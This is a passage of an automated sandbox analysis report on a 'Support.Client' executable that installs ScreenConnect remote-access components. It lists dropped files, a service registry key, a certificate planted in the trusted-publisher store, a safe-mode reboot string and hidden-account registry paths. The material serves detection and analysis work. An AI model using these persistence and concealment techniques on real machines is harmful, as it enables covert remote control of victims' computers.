                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5BE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1965505109.0000000004BA2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Support.Client (1).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Support.Client (1).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Support.Client (1).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Support.Client (1).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Support.Client (1).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0x802B6300 [Sun Feb 21 01:04:00 2038 UTC]
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00611000
                  Source: Support.Client (1).exeStatic PE information: real checksum: 0x1cb11 should be: 0x14b19
                  Source: C:\Users\user\Desktop\Support.Client (1).exeCode function: 0_2_00611BC0 push ecx; ret 0_2_00611BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B77D2A5 pushad ; iretd 1_2_00007FFD9B77D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B896110 pushfd ; ret 1_2_00007FFD9B8D62E1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B897D00 push eax; retf 1_2_00007FFD9B897D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFD9B8BD7B5 push eax; retf 1_2_00007FFD9B8BD7FD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 10_2_00CA7318 push eax; retf 10_2_00CA7319
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 10_2_00CA7768 push esp; iretd 10_2_00CA7769
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_04FDB0C0 push eax; mov dword ptr [esp], ecx11_2_04FDB0C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_04FD82B0 push eax; mov dword ptr [esp], ecx11_2_04FD82B1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_058381E1 pushad ; ret 11_2_058381F3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_0583AFAF push es; iretd 11_2_0583B020
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_0583E9E0 push es; ret 11_2_0583E9F0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeCode function: 11_2_063930E0 push es; ret 11_2_063930F0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8B22F4 push ebx; retf 12_2_00007FFD9B8B22FA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8B096D push ebx; retf 12_2_00007FFD9B8B098A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B8B08CD push ebx; retf 12_2_00007FFD9B8B098A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB827A push ebp; ret 12_2_00007FFD9BBB82EA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB82BE push ebp; ret 12_2_00007FFD9BBB82EA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB527A pushad ; ret 12_2_00007FFD9BBB5289
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB80BD push ebx; ret 12_2_00007FFD9BBB810A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB8040 push edx; ret 12_2_00007FFD9BBB804A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB37B4 pushad ; iretd 12_2_00007FFD9BBB37B5
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB7F78 push eax; ret 12_2_00007FFD9BBB7F8A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB85C9 push edi; ret 12_2_00007FFD9BBB85EA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BBB8521 push edi; ret 12_2_00007FFD9BBB854A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B8822F4 push ebx; retf 13_2_00007FFD9B8822FA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B88096D push ebx; retf 13_2_00007FFD9B88098A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9B8808CD push ebx; retf 13_2_00007FFD9B88098A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BB93A75 push es; ret 13_2_00007FFD9BB93A8A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BB90A40 push edx; retn FD9Bh13_2_00007FFD9BB90A9A

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (9298e168-a0cf-488d-954c-5c180dd52fec)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1964904013.0000000000D02000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.2932709226.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024038339.0000000000BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\Support.Client (1).exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
